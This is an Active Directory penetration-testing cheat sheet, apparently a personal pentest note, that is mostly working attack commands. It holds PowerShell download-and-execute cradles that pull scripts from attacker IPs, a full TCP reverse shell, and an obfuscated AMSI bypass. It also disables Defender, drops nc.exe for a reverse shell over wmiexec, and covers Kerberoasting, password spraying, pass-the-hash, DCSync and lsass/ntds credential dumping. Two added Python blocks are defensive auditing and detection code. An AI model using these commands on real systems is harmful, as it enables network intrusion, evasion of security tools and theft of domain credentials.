
AD PenTest - Recon and Initial Access

Use PowerSploit/PrivEsc/PowerUp.ps1 to find some potential info

Check for non-Windows processes on Windows using netstat

Step 1: Check net user, admin and user rights

Step 2: Check if we have access to PowerShell; if yes, run PowerUp.ps1, Sherlock.ps1 and JAWS.ps1.

Step 3: Try to get Meterpreter.

Step 4: Load mimikatz, try to bypass UAC, check SAM, SYSTEM etc.

Step 5: Check for weird programs and registry entries.

Step 6:
If the box is a Domain Controller - Enum - Enum SMB users / LDAP users / BloodHound - GUI AD enum & Kerberos enum - Bruteforce - Attacking AD with LDAP & Kerberos

Step 7:
Got creds - try psexec.py or crackmapexec - cheatsheet


Download rev Shells on the target 

#download and execute the script

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10/powerrev.ps1')

#Run the shell in memory
powershell.exe "iex (Invoke-WebRequest 'http://10.10.10.10:8001/powerrev.ps1' -UseBasicParsing)"

powershell.exe "iex (iwr 'http://10.10.10.10:8001/powerrev.ps1' -UseBasicParsing)"

#download the rev shell on the target and save it
powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1

#Another way of downloading a file
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"

# Download and execute Automatically
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile -

#Powershell V3
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1')


$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText

$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()


More info from HackTricks (hacktricks.xyz)
PowerShell Reverse Shells

powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',5985);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

try the shell from this link
Local user Enum Using Net user 

whoami /priv

whoami /groups

net user UserName /domain

net localgroup "Remote Management Users"
Basic AD Enum After Initial Access using AD Module

#Get Domain Details
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()


#Loading AD Modules
Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module ActiveDirectory.psd1 -Verbose

User Enumeration

#View all users in the domain
Get-ADUser -Filter *

#View all user properties
get-aduser -Identity kyomah -Properties *

#ALL user Objects

Get-ADUser -Filter * -Properties * |select -First 1 | Get-Member -MemberType *Property | select Name

#Find last password set date (pwdLastSet is a FILETIME, hence the conversion)

Get-ADUser -Filter * -Properties pwdLastSet | select Name, @{Name='PwdLastSet';Expression={[datetime]::FromFileTime($_.pwdLastSet)}}

#View Account Descriptions to check for stored passwords
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name,Description

#Finding user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


Computer Enumeration

#view all computer names
Get-ADComputer -Filter * | select name

#Find Windows Server 2019 machines (change the pattern for other versions, e.g. *2012*)
Get-ADComputer -Filter 'OperatingSystem -like "*2019*"' -Properties OperatingSystem | select Name,OperatingSystem

#Check if machines are online/pingable
Get-ADComputer -Filter * -Properties DNSHostName |%{Test-Connection -Count 1 -ComputerName $_.DNSHostName}

User Groups Enumeration

#Find all groups in the Domain
Get-ADGroup -Filter * |select name

#Get verbose info about groups
Get-ADGroup -Filter * -Properties *

#Find Complete info about specific group

Get-ADGroup -Identity 'Enterprise Admins' -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"'| select Name

Group Membership Enum

#Find the members of a group
Get-ADGroupMember -Identity 'Enterprise Admins' -Recursive | select SamAccountName

#Find the groups a user is member of

Get-ADPrincipalGroupMembership -Identity UserName | select name

GPO Enumeration:

#Get GPO list in current domain

Get-gpo -all

#Restricted groups policy (PowerView cmdlet, not AD module)
Get-NetGPOGroup

#Finding OUs
Get-ADOrganizationalUnit -Filter * -Properties *

Forest Enumeration

#Domain Trust Mapping

Get-ADTrust -Identity steins.local

#Forest Details
Get-ADForest
Get-AdForest -Identity Steins.local

#Get all domains in current forest

(Get-ADForest).Domains

#Get all Global catalogs for current forest

Get-ADForest | select -ExpandProperty GlobalCatalogs

#Map Trusts of Forests

Get-ADTrust -Filter 'msDS-TrustForestTrustinfo -ne "$null"'



Basic AD Enum After Initial Access using PowerView

powershell.exe -ep bypass
Import-Module ./PowerView.ps1

#View all the computers in the domain
Get-DomainComputer | Select name

#List the users in the domain
Get-DomainUser

#View all the shares of the computers
Find-DomainShare
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Get-Help Get-NetFileServer

#List all groups on a machine:
Get-netlocalgroup -ComputerName steinsdc -ListGroups

#Find computers where members of a given group (here RDPUsers) have sessions
Invoke-UserHunter -GroupName "RDPUsers"

#Find Computers where domain admin is logged in
Invoke-UserHunter -Stealth

#Finding user accounts used as Service accounts
Get-NetUser -SPN
Finding machines with local admin access

In case SMB is disabled, import the script from https://jdhitsolutions.com/blog/wp-content/uploads/2011/07/get-wmiadmin.txt and run the commands below


Find-WMILocalAdminAccess -ComputerFile ./computers.txt -Verbose

Find-WMILocalAdminAccess -ComputerName starkt

LDAP Enumeration:

ldapsearch -x -h 10.10.10.10 -s base namingcontexts 

ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt


Dumping passwords using LDAP:

ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
Domain Enumeration with rpcclient

#Enum using Null Session
rpcclient -U "" 10.10.10.10

#Login as a user
rpcclient -U USERNAME //10.10.10.10

#Find users in the domain
rpcclient -Uuser_Name%PASSWORD -c enumdomusers 10.10.10.10

#Find domain info
rpcclient -Uuser_Name%PASSWORD -c querydominfo 10.10.10.10

#Find groups and their aliases
rpcclient -Uuser_Name%PASSWORD -c "enumalsgroups builtin" 10.10.10.10

#Find more info using an alias and note the SIDs
rpcclient -Uuser_Name%PASSWORD -c "queryaliasmem builtin 0x244" 10.10.10.10

#Find more info using SIDs
rpcclient $> lookupsids S-1-5-21-586154515854-343543654-8743952433-1105

#Reset another user's password
rpcclient -U user1 //10.10.10.10
setuserinfo2 USER2 23 'PASSWORD'

Enum using RPCClient


rpcclient -U DOMAIN\\Username 10.10.10.10 #Enter pass

enumdomusers #Enumerate Domain Users

lookupnames username #Get user S-ID

queryuser user_id #Example queryuser 0x1f2

querydispinfo #Display users info

enumprivs        #Enum Privileges

enumprinters    #Enum Printers
Creds sniffing when SMB signing is not required / disabled

responder -I tun0 -F --lm -d -w -i KALI_IP

net use \\10.10.14.239 #on the target machine, or access any SMB share on the attacker host

or

responder -I tun0 -rPv

#NTLMv2 Hash
hashcat -m 5600 hash ~/Downloads/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule

Find users with SPNs set on their accounts

#import the module and Find the users
Import-Module .\GetUserSPNs.ps1

or
#AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

or
#PowerView
Get-NetUser -SPN

#request the users ticket

powershell.exe -exec bypass -c "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPNNAME/hostname.steins.LOCAL:1433' "

Import-Module .\Invoke-Kerberoast.ps1

#Generate the hash
Invoke-Kerberoast -OutputFormat Hashcat

#Cracking the hash
hashcat -m 13100 -a 0 ticket.hashcat /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule --force

or

hashcat -a 0 -m 13100 ticket.hashcat /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force

or

hashcat -a 0 -m 13100 hash ~/Downloads/Tools/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force

List the users with SPN set

sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark

GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark -outputfile hashes.txt -k

You can review the errors here: KRB_AP_ERR_BAD_INTEGRITY means the authenticator was encrypted with something other than the session key, so the client cannot decrypt the resulting message. The modification of the message could be the result of an attack or it could be because of network noise.

#Create ccache file (used by the -k option above)
getTGT.py -dc-ip 10.10.10.10 Steins.local/mark
export KRB5CCNAME=mark.ccache
Brute Forcing Kerberos

kerbrute userenum --dc 10.10.10.10 -d steins.local users.txt 

Download Kerbrute from here
kerbrute userenum --domain htb.local /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.10 
 
AS-REP Roast: get the hash of users that do not require Kerberos pre-authentication

sudo GetNPUsers.py STEINS-DC.LOCAL/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.10.10.10

sudo john hash --format=krb5asrep --wordlist=rockyou.txt 
# better copy rockyou.txt to the same location  
AS-REP Roast as an authenticated user

python3 GetNPUsers.py steins.local/user:"password!" -dc-ip 10.10.10.10 -request
 
Updating time to match the DC - KRB_AP_ERR_SKEW (Clock skew too great)

#Display the time of the server
proxychains net time -S 10.10.10.10

or

#Get DC time from curl response headers
proxychains curl DC_IP:5985 -v

sudo date -s "Thu Dec 24 <HH:MM:SS YYYY as reported by the DC>"
Kerberoasting

.\Rubeus.exe kerberoast /domain:steins.local /user:username /format:hashcat /outfile:hash.txt

hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force  
Kerberoast:

Save the TGS to disk and brute force it :P. The DC identifies the service account by its ServicePrincipalName, but service account passwords are freaking hard to crack in most cases.


Finding user accounts used as Service accounts: List SPNs

PowerView: Get-NetUser -SPN
AD: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


Request a ticket (TGS): take the SPN name from the command above

#AD module - get TGS (KerberosRequestorSecurityToken takes the SPN string; the Receiver class takes a raw ticket)
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN_NAME/Steins.local"

#Check tokens and confirm the TGS
klist

#Saves the tickets from memory to DISK
Invoke-Mimikatz -Command '"Kerberos::list /export"'

#PowerView: supports JTR & hashcat
Request-SPNTicket

Old way of cracking the Kerberos ticket hash
python tgscrack.py wordlist.txt hash_fileName


OR

# Requesting TGS (Ticket Granting Service)
GetUserSPNs.py steins.local/kyomah:Welcome@1 -dc-ip 192.168.227.144 -request

#Cracking Kerberos 5 TGS using hashcat
hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force 
 
Targeted Kerberoasting / AS-REP roasting

powerview.ps1 Get-DomainUser -PreauthNotRequired -Verbose

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth


OR check for users on which we can modify the ACL
---------------------------------------------- Searching for GenericAll rights

#Finding users with enough permissions to modify ACLs
powerview_dev.ps1 Invoke-ACLScanner -ResolveGUIDs | ? {$_.IdentityReferenceName -match "RDPUsers"}

#Changing the ACL of the user: Disabling PreAuth for Kerberos
Powerview.exe Set-DomainObject -Identity USER_NAME -XOR @{useraccountcontrol=4194304} -Verbose

#Now the user should show up among the accounts for which pre-auth is not required:
Powerview.exe Get-DomainUser -PreAuthNotRequired -Verbose

#Requesting AS-REP for offline bruteforcing:
https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 (deprecated)
Get-ASREPhash -Username USER_NAME -Verbose

OR
#use Asreproast to get the hash of the user account, remove all the spaces from the hash before bruteforcing
https://github.com/GhostPack/Rubeus#asreproast
Rubeus.exe asreproast /user:TestOU3user
OR
Rubeus.exe asreproast /user:Administrator /format:hashcat /outfile:hash.txt

#Copy the hash and crack it using JTR hashcat
john krbhash --wordlist=wordlist.txt
 

#Cracking using hashcat; add $23 after $krb5asrep if you did not export the hash in hashcat format
hashcat -m 18200 -a 0 hash rockyou.txt
hashcat -m 18200 hash rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force
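Added, defender-side example that is not code from the original post: it takes records shaped like the output of Get-ADUser -Properties * (constructed here, not from a real domain) and flags what the AD-module user enumeration above and this AS-REP section look for: password hints in descriptions, SPNs on user accounts, the DONT_REQ_PREAUTH bit (0x400000 = 4194304, the value toggled by the -XOR command) and stale pwdLastSet values converted from FILETIME. The flag names and bit values are the documented userAccountControl constants; everything else is an assumption made for the sample.

```python
from datetime import datetime, timedelta, timezone

# userAccountControl bits (subset of the documented values);
# 0x400000 == 4194304, the value the Set-DomainObject -XOR command toggles.
UAC_FLAGS = {"ACCOUNTDISABLE": 0x2, "NORMAL_ACCOUNT": 0x200,
             "DONT_EXPIRE_PASSWORD": 0x10000, "DONT_REQ_PREAUTH": 0x400000}

# pwdLastSet is a FILETIME: 100 ns ticks since 1601-01-01 UTC, which is
# what [datetime]::FromFileTime converts in the PowerShell one-liner above.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def decode_uac(value):
    """Names of the userAccountControl flags set in value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]

def filetime_to_datetime(filetime):
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)

def datetime_to_filetime(dt):
    return int((dt - FILETIME_EPOCH).total_seconds()) * 10_000_000

def audit_user(user, now, max_pwd_age_days=365):
    """Findings for one record shaped like a Get-ADUser -Properties * object."""
    findings = []
    flags = decode_uac(user.get("userAccountControl", 0))
    if "ACCOUNTDISABLE" in flags:
        return findings  # disabled accounts cannot be roasted or sprayed
    if "DONT_REQ_PREAUTH" in flags:
        findings.append("AS-REP roastable: DONT_REQ_PREAUTH set")
    if user.get("servicePrincipalName"):
        findings.append("Kerberoastable: SPN on user account")
    desc = (user.get("description") or "").lower()
    if "pass" in desc or "pwd" in desc:
        findings.append("description may contain a password")
    pwd_last_set = user.get("pwdLastSet", 0)
    if pwd_last_set == 0:
        findings.append("password never set or must change at next logon")
    elif (now - filetime_to_datetime(pwd_last_set)).days > max_pwd_age_days:
        findings.append("password older than %d days" % max_pwd_age_days)
    return findings

def audit_domain(users, now):
    """Map sAMAccountName -> findings, leaving out clean accounts."""
    report = {}
    for user in users:
        findings = audit_user(user, now)
        if findings:
            report[user["sAMAccountName"]] = findings
    return report

def _ft(year, month, day):
    """FILETIME for a UTC midnight; only used to build the samples."""
    return datetime_to_filetime(datetime(year, month, day, tzinfo=timezone.utc))

# Constructed sample records for a hypothetical domain, not real data.
NOW = datetime(2021, 6, 1, tzinfo=timezone.utc)
SAMPLE_USERS = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.steins.local:1433"],
     "description": "SQL service, pass is in the vault", "pwdLastSet": _ft(2020, 1, 1)},
    {"sAMAccountName": "jorden", "userAccountControl": 0x400200,
     "servicePrincipalName": [], "description": "", "pwdLastSet": _ft(2021, 5, 1)},
    {"sAMAccountName": "old_admin", "userAccountControl": 0x202,
     "servicePrincipalName": [], "description": "pass: Welcome1", "pwdLastSet": 0},
    {"sAMAccountName": "kyomah", "userAccountControl": 0x200,
     "servicePrincipalName": [], "description": "", "pwdLastSet": _ft(2021, 5, 1)},
]
```

Feed it the JSON export of a real Get-ADUser -Filter * -Properties * run and the report lists the accounts to fix (remove the pre-auth exemption, move SPNs to gMSAs, rotate stale passwords) before anyone roasts them.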
Abusing Kerberos with users who don't have SPNs
------------------------------------------------
- Set an SPN for the user and request a TGS

#Searching for users with GenericAll permissions set
powerview.exe Invoke-ACLScanner -ResolveGUIDs | ? {$_.IdentityReferenceName -match "RDPUsers"}

#Find the user who doesn't have an SPN set already using the AD module:
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName

#Set an SPN for the user (must be unique in the domain)
powerview.exe Set-DomainObject -Identity USER_NAME -Set @{servicePrincipalName = 'DomainName/SomeUniqueName'}
AD: Set-ADUser -Identity USER_NAME -ServicePrincipalNames @{Add='DomainName/SomeUniqueName'}

#Now if you check you should see SPN Set to the username
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName

Now request a TGS:
---------------------
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "DomainName/SomeUniqueName"

#check the TGS for DomainName/SomeUniqueName
klist

#Export the tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'

#Crack the TGS
python tgscrack.py wordlist.txt hash_fileName

Log generated on the DC: Security event 4769 (A Kerberos service ticket was requested)
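As an added, defender-side example (not part of the original post), the detector below runs the usual Kerberoasting heuristic over those 4769 records: RC4 (0x17) service tickets for services that are neither krbtgt nor computer accounts, several distinct ones from one account inside a short window. It assumes the events have already been parsed (EVTX export, event forwarding, SIEM) into dicts carrying the 4769 EventData field names; the sample log is constructed.

```python
from collections import defaultdict
from datetime import datetime

RC4_HMAC = 0x17  # TicketEncryptionType roasting tools ask for; AES is 0x11/0x12

def is_roast_candidate(ev):
    """Successful 4769 for an RC4 ticket to a non-computer, non-krbtgt service."""
    if ev.get("EventID") != 4769 or ev.get("Status", "0x0") != "0x0":
        return False
    if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
        return False
    service = ev["ServiceName"].lower()
    return service != "krbtgt" and not service.endswith("$")

def detect_kerberoast(events, window_seconds=300, threshold=3):
    """Return {account: sorted services} for accounts that requested tickets
    for >= threshold distinct candidate services inside any sliding window."""
    per_user = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            user = ev["TargetUserName"].split("@")[0].lower()
            per_user[user].append((datetime.fromisoformat(ev["TimeCreated"]),
                                   ev["ServiceName"].lower()))
    alerts = {}
    for user, requests in per_user.items():
        requests.sort()  # forwarded events may arrive out of order
        for i, (start, _) in enumerate(requests):
            services = {svc for t, svc in requests[i:]
                        if (t - start).total_seconds() <= window_seconds}
            if len(services) >= threshold:
                alerts[user] = sorted(services)
                break
    return alerts

def _ev(time, user, service, etype, status="0x0"):
    """Build one constructed 4769 record with the EventData fields used above."""
    return {"EventID": 4769, "TimeCreated": time, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype,
            "Status": status, "IpAddress": "10.10.10.50"}

# Constructed sample log: one roasting burst, normal AES traffic to computer
# accounts, a single RC4 request, a failed request and a slow trickle.
SAMPLE_EVENTS = [
    _ev("2021-06-01T10:00:00", "alice@STEINS.LOCAL", "svc_sql", "0x17"),
    _ev("2021-06-01T10:00:05", "alice@STEINS.LOCAL", "svc_web", "0x17"),
    _ev("2021-06-01T10:00:09", "alice@STEINS.LOCAL", "svc_backup", "0x17"),
    _ev("2021-06-01T10:00:12", "alice@STEINS.LOCAL", "krbtgt", "0x12"),
    _ev("2021-06-01T10:00:20", "alice@STEINS.LOCAL", "svc_other", "0x17", "0x1b"),
    _ev("2021-06-01T10:01:00", "bob@STEINS.LOCAL", "FS01$", "0x12"),
    _ev("2021-06-01T10:01:03", "bob@STEINS.LOCAL", "WEB01$", "0x12"),
    _ev("2021-06-01T10:02:00", "carol@STEINS.LOCAL", "svc_sql", "0x17"),
    _ev("2021-06-01T09:00:00", "dave@STEINS.LOCAL", "svc_sql", "0x17"),
    _ev("2021-06-01T09:30:00", "dave@STEINS.LOCAL", "svc_web", "0x17"),
    _ev("2021-06-01T10:30:00", "dave@STEINS.LOCAL", "svc_backup", "0x17"),
]
```

Lowering the threshold or widening the window catches the slow trickle at the cost of more noise from legacy applications that still negotiate RC4; enabling AES on service accounts removes the RC4 signal altogether.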

BloodHound-Python
Needs admin creds and access to the DC - GitHub

Linux:


proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp

A few JSON files will appear in the same location; import them into BloodHound

Kali: apt-get install bloodhound
sudo neo4j console
go to localhost:7474
neo4j: neo4j #login in browser and change the password

bloodhound #the BloodHound login will pop up, log in with the new creds

Windows:


Download this on Windows target: SharpHound.ps1


powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain Steins.local -ZipFileName file.zip

invoke-Bloodhound -CollectionMethod LoggedOn -Verbose

or

SharpHound.exe -c All -d Steins.local --zipfilename test.zip

OR
.\SharpHound.exe -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin --ldappassword P@$$W0rd! --zipfilename domain.zip -c All

open the file in bloodhound --> click on upload --> select file


For Testing:

git clone https://github.com/BloodHoundAD/BloodHound-Tools
cd DBCreator
pip install neo4j-driver
sudo pip3 install neo4j
python3 DBCreator.py
sudo neo4j console
dbconfig
Access other user's share 

net use \\DC.STEINS.LOCAL\c$ /user:STEINS.LOCAL\admin 'P@$$W0rd!'

or


$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)


invoke-command -computername dc -scriptblock { dir C:\users\username\desktop } -credential $cred
Add a user to another group

Powerview:

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

Windows:
net group "Remote Admin Permissions" USERNAME /add /domain
Disable antivirus / Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Disable AMSI

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Adding DoNotPre-Auth on target user

works only after logging in

Set-ADAccountControl -Identity jorden -doesnotrequirepreauth $true
Password Spraying 

Import-Module PowerView.ps1

#List all domain users and save them to a text file
PowerShell Get-DomainUser | select -ExpandProperty samaccountname | Out-File users.txt

Import-Module DomainPasswordSpray.ps1

Invoke-DomainPasswordSpray -UserList users.txt -Password 'P@$$W0rd!' -OutFile sprayed-creds.txt

or


proxychains crackmapexec smb 10.10.10.10 -d steins.local -u users.txt -p 'p@$$w0rd1' --continue-on-success
Get User Account Details 

net user UserName /domain

or

PowerShell Get-DomainUser UserName
Open a shell using creds if port 5985 (WinRM) is open

sudo evil-winrm -u USERNAME -p PASSWORD -i 10.10.10.10

or

evil-winrm -u username -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.10
or

psexec.py USERNAME@10.10.10.10

or

sudo secretsdump.py USERNAME@10.10.10.10

or, after logging in to the machine:
./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

or
evil-winrm -i 10.10.10.10 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

or
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 steins.local/administrator@10.10.10.10

or


.\SharpDPAPI.exe machinecredentials

psexec.py Administrator@10.10.10.10 -hashes LMHASH:NTHASH
Extracting password hashes from ntds.dit & the SYSTEM hive

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

#login as Admin using the hash
evil-winrm -H 9658dsa3t1d9250115e2205d9f48400d -u administrator -i 10.10.10.10

#For Clear Text Password

lsassy -d steins.local -u Administrator -H 9658dsa3t1d9250115e2205d9f48400d 10.10.10.10 -m 0 --procdump procdump.exe --dumpert dumpert.exe

#Download the hashes dump

secretsdump.py -just-dc-ntlm STEINS.LOCAL/administrator:"Password!"@10.10.10.10 -use-vss
Dumping Creds if you find lsass.dmp

mimikatz.exe
sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords full
Writable directories
Save exploits/tools in the directories below.

C:\Windows\System32\spool\drivers\color\
Running a Powershell Script on Target Machine 

http://website.com/cmd.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33/pu.ps1')| powershell -noprofile - 
RCE using wmiexec

proxychains wmiexec.py -debug -nooutput domain/username:'password'@TARGET_ip "powershell.exe Invoke-WebRequest -Uri 'http://KALI_ip/nc.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\nc.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe KALI_IP 9001"
Port Scan a Target Machine 

Download Invoke-PortScan from here

PowerShell Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30 | Where { $_.Alive -eq "True" }
Enumerating the AD Recycle Bin

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

#Now check for users passwords. might come in handy sometimes
Get-ADObject -filter { SAMAccountName -eq "UserName" } -includeDeletedObjects -property *








